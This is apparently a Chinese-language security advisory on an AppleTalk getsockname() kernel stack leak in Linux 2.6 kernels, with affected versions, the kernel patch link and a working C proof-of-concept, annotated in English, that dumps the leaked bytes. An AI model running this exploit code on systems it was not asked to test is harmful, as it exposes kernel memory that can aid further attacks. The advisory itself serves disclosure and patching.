Linux Kernel ‘net/appletalk/ddp.c’本地信息泄漏漏洞

漏洞起因
设计错误
 
影响系统
Linux kernel 2.6.30 rc6
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 4
Linux kernel 2.6.29 1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 9
Linux kernel 2.6.28 8
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 24
Linux kernel 2.6.27 14
Linux kernel 2.6.27 13
Linux kernel 2.6.27 12
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 -rc8-git5
Linux kernel 2.6.27 -rc8
Linux kernel 2.6.27 -rc6-git6
Linux kernel 2.6.27 -rc6
Linux kernel 2.6.27 -rc5
Linux kernel 2.6.27 -rc2
Linux kernel 2.6.27 -rc1
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 4
Linux kernel 2.6.26 3
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 -rc6
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24 -rc5
Linux kernel 2.6.24 -rc4
Linux kernel 2.6.24 -rc3
Linux kernel 2.6.24 -git13
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23 -rc2
Linux kernel 2.6.23 -rc1
Linux kernel 2.6.23
Linux kernel 2.6.22 7
Linux kernel 2.6.22 1
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 -git5
Linux kernel 2.6.20
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.8.1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.26.1
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24-rc2
Linux kernel 2.6.24-rc1
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.22-rc7
Linux kernel 2.6.22-rc1
Linux kernel 2.6.21-RC6
Linux kernel 2.6.21-RC5
Linux kernel 2.6.21-RC4
Linux kernel 2.6.21-RC3
Linux kernel 2.6.21-RC3
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20.1
Linux kernel 2.6.20-rc2
Linux kernel 2.6.20-2
Linux kernel 2.6.18-8.1.8.el5
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.15.5
Linux kernel 2.6.15.11
Linux kernel 2.6.15-27.48
Linux kernel 2.6.11.4
 
不受影响系统
 
危害
本地攻击者可以利用漏洞获得内核敏感信息。
 
攻击所需条件
攻击者必须能够以本地用户身份访问受影响的Linux系统。
 
漏洞信息
Linux是一款开放源代码的操作系统。
Linux内核‘net/appletalk/ddp.c’文件中的atalk_getname()函数在处理getsockname()请求时,没有将返回给用户的struct sockaddr_at中8字节的sat_zero字段清零,该字段因此带有内核栈上的残留数据,可向本地用户泄漏8字节内核内存,导致敏感信息泄漏。
 
测试方法
/**
 * appleak.c
 *
 * Linux keunouille <= 2.6.30
 *
 * AppleTalk getsockname() 8-bytes kernel stack disclosure
 *
 * http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=3d392475c873c10c10d6d96b94d092a34ebd4791
 *
 * atalk_getname() can leak 8 bytes of kernel memory to user
 *
 * [clem1@noe ~]$ ./appleak
 * 1e 83 f2 31 ec 56 d7 f6 | …1.V..
 * 00 f4 55 f6 84 2a ca bf | ..U..*..
 * 00 f4 55 f6 1e 83 f2 31 | ..U….1
 * 1e 83 f2 31 00 60 5e f6 | …1.`^.
 * 00 f4 55 f6 84 2a ca bf | ..U..*..
 * c0 2a 54 c0 a8 61 45 f6 | .*T..aE.
 * 21 54 12 c0 84 2a ca bf | !T…*..
 * (…)
 *
 * (c) Clément LECIGNE <root[a]clem1.be>
 */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <net/if_arp.h>
#include <linux/atalk.h>
/**
 * Issue randomly chosen kernel calls until one of them returns >= 0.
 *
 * Each pass picks one of three actions with rand(): a bare system call taken
 * from randcalls[], a getsockopt() on fd, or a setsockopt() on fd. The loop
 * ends as soon as a call reports a non-negative result.
 *
 * NOTE(review): the page does not state the intent; presumably the calls are
 * there so that the bytes main() reads back from getsockname() differ from
 * one iteration to the next -- confirm against the referenced original.
 *
 * @param fd  socket descriptor used for the getsockopt()/setsockopt() cases
 */
void kernop(int fd)
{
    /* from Jon Oberheide sploit
     */
    /* System call numbers to choose from; they are invoked below with no
     * arguments at all. */
    const int   randcalls[] = {
        __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
        __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
        __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
        __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
        __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
        __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
        __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
        __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
        __NR_sched_getparam, __NR_sched_get_priority_max
    };
    /* Values passed as the sockopt "level"; AF_APPLETALK is an address-family
     * constant that is used here as a level value. */
    const int   randsopts[] = { SOL_SOCKET, AF_APPLETALK };
    /* NOTE(review): len is an int, while getsockopt() takes a socklen_t *;
     * the mismatch only draws a compiler warning here. */
    int         ret, len;
    /* Never initialised: setsockopt() below is handed whatever the stack holds. */
    char        buf[1024];
    do
    {
        /* rand() % 3 is always 0, 1 or 2, so ret is assigned on every pass. */
        switch ( rand() % 3 )
        {
            case 0:
                /* '%' and '/' bind equally and associate left to right, so the
                 * index is (rand() % sizeof(array)) / sizeof(element); that is
                 * still within 0 .. element_count - 1. */
                ret = syscall(randcalls[rand() % sizeof(randcalls)/sizeof(randcalls[0])]);
                break;
            case 1:
                /* Option length is either sizeof(int) or the whole buffer. */
                len = (rand() % 2) ? sizeof(int) : sizeof(buf);
                /* Option name is a random value in 0..129; the order in which
                 * the two rand() arguments are evaluated is unspecified. */
                ret = getsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, &len);
                break;
            case 2:
                len = (rand() % 2) ? sizeof(int) : sizeof(buf);
                /* Same random level/option selection as the getsockopt() case. */
                ret = setsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, len);
                break;
        }
    }
    while ( ret < 0 );   /* retry until some call succeeds */
}
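/**
 * Print a buffer as a hex dump, eight bytes per row.
 *
 * Every row shows the bytes in hex, then "| " and the same bytes as text,
 * with each byte outside printable ASCII (0x20..0x7e) shown as '.'.
 *
 * The text column is computed from the byte value instead of being looked up
 * in a string table indexed by byte value: the table printed on this page had
 * its runs of '.' converted to multi-byte ellipsis characters, so its
 * positions no longer line up with byte values and an index up to 255 is not
 * guaranteed to stay inside it.
 *
 * A final row shorter than eight bytes is padded so that it also gets its
 * text column and newline; for lengths that are a multiple of eight the
 * output format is unchanged.
 *
 * @param data  bytes to print; nothing is printed when this is NULL
 * @param len   number of bytes available at data
 */
void dump( unsigned char * data, unsigned int len )
{
    enum { ROW_BYTES = 8 };
    unsigned int off = 0;

    if ( data == NULL )
    {
        return;
    }

    while ( off < len )
    {
        unsigned int i;
        unsigned int n = len - off;

        if ( n > ROW_BYTES )
        {
            n = ROW_BYTES;
        }

        /* hex column */
        for ( i = 0; i < n; i++ )
        {
            printf("%02x ", data[off + i]);
        }
        /* keep the separator aligned on a short final row */
        for ( ; i < ROW_BYTES; i++ )
        {
            printf("   ");
        }

        printf("| ");

        /* text column: printable ASCII as-is, everything else as '.' */
        for ( i = 0; i < n; i++ )
        {
            unsigned char c = data[off + i];

            printf("%c", (c >= 0x20 && c <= 0x7e) ? c : '.');
        }
        printf("\n");

        off += n;
    }
}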
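/**
 * Check whether getsockname() on an AppleTalk socket hands back non-zero
 * bytes in the sat_zero field of struct sockaddr_at.
 *
 * The program binds an AF_APPLETALK datagram socket, then repeats up to 499
 * times: call kernop(), call getsockname(), and hex-dump sat_zero whenever it
 * differs from the previously seen value. The structure is zeroed before
 * bind(), so any non-zero sat_zero content was written by the kernel. On a
 * kernel that carries the fix referenced on this page the field is expected
 * to stay zero, in which case nothing is printed.
 *
 * Changes from the listing as published: the loop condition is restored to
 * "--occ" (the page shows a typographic dash that does not compile), the
 * address length uses socklen_t as getsockname() requires and is reset before
 * each call because it is an in/out argument, and the socket is closed when
 * bind() fails.
 *
 * @return EXIT_SUCCESS after the loop completes, EXIT_FAILURE if the socket
 *         cannot be created or bound
 */
int main(void)
{
    struct sockaddr_at  sat;
    socklen_t           len = sizeof(sat);
    int                 s, occ = 500;
    char                prev_zero[sizeof(sat.sat_zero)] = { 0 };

    s = socket(AF_APPLETALK, SOCK_DGRAM, 0);
    if ( s == -1 )
    {
        perror("socket");
        return EXIT_FAILURE;
    }

    /* Start from an all-zero address so sat_zero is known to be clean. */
    memset(&sat, 0, sizeof(sat));
    sat.sat_family = AF_APPLETALK;
    sat.sat_addr.s_net = htons(ATADDR_ANYNET);
    sat.sat_addr.s_node = ATADDR_ANYNODE;
    sat.sat_port = ATADDR_ANYPORT;
    if ( bind(s, (struct sockaddr *) &sat, len) < 0 )
    {
        perror("bind");
        close(s);
        return EXIT_FAILURE;
    }

    srand(time(NULL) ^ getpid());
    while ( --occ )
    {
        kernop(s);
        len = sizeof(sat);   /* getsockname() overwrites len with the result size */
        if ( getsockname(s, (struct sockaddr *) &sat, &len) == 0 )
        {
            /* Report only values that differ from the last one shown. */
            if ( memcmp(sat.sat_zero, prev_zero, sizeof(sat.sat_zero)) != 0 )
            {
                dump((unsigned char *) &sat.sat_zero, sizeof(sat.sat_zero));
                memcpy(&prev_zero, &sat.sat_zero, sizeof(sat.sat_zero));
                usleep(5000);
            }
        }
    }
    close(s);
    return EXIT_SUCCESS;
}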
 
厂商解决方案
用户可参考如下内核提交获得补丁信息(该补丁在atalk_getname()将地址结构返回给用户之前把sat_zero字段清零):
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3d392475c873c10c10d6d96b94d092a34ebd4791
 
漏洞提供者
Clément LECIGNE
